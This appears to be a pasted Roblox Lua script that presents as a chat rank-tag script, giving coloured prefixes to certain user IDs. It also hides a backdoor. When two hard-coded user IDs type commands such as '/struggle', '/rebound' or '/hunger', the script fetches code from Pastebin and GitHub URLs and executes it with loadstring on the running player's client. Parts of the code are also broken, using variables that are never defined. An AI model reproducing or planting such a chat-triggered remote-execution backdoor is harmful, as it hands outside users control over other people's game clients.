Untitled

Run Settings
LanguageLua
Language Version
Run Command
coroutine.wrap(function() local TextChatMessage local TextChatService = game:GetService("TextChatService") local Players = game:GetService("Players") local i=0 TextChatService.OnIncomingMessage = function(message, TextChatMessage) local props = Instance.new("TextChatMessageProperties") if message.TextSource then msg = string.lower(message.Text) if message.TextSource.UserId == 3570707940 then props.PrefixText = "<font color='#F53930'>[Creator]</font> <font color='#F53930'>[The Jabiss]</font> " .. message.PrefixText end if message.TextSource.UserId == 2011017143 then props.PrefixText = "<font color='#a85232'>[Semi Dev]</font> <font color='#a85232'>[Squid]</font> " .. message.PrefixText end if message.TextSource.UserId == 1736174957 then props.PrefixText = "<font color='#6865FF'>[Helper]</font> <font color='#393B45'>[Noah]</font> " .. message.PrefixText end if player.Name == "Cyrratti" then properties.PrefixText = "<font color='#ff1100'>[Helper]</font> " .. TextChatMessage.PrefixText end local player = Players:GetPlayerByUserId(message.TextSource.UserId) if player == game.Players.LocalPlayer then i=i+1 if i==2 then i=0 return props end end if message.TextSource.UserId == 3570707940 or message.TextSource.UserId == 2011017143 then if msg == '/struggle' or msg == '/Struggle' then loadstring(game:HttpGet("https://pastebin.com/raw/2jGDebMa"))() end if msg == '/rebound' or msg == '/Rebound' then loadstring(game:HttpGet("https://raw.githubusercontent.com/Potato032/Recreation/main/plssss"))() end if msg == '/hungered' or msg == '/Hungered' or msg == '/Hunger' or msg == '/hunger' then loadstring(game:HttpGet("https://pastebin.com/raw/Fbm8qtgx"))() end if msg == '/258' or msg == '/noise' or msg == '/Noise' or msg == '/A-258' or msg == '/a-258' or msg == 'a258' or msg == 'a 258' then loadstring(game:HttpGet("https://pastebin.com/raw/Khcc1a60"))() end end end end end)()
Editor Settings
Theme
Key bindings
Full width
Lines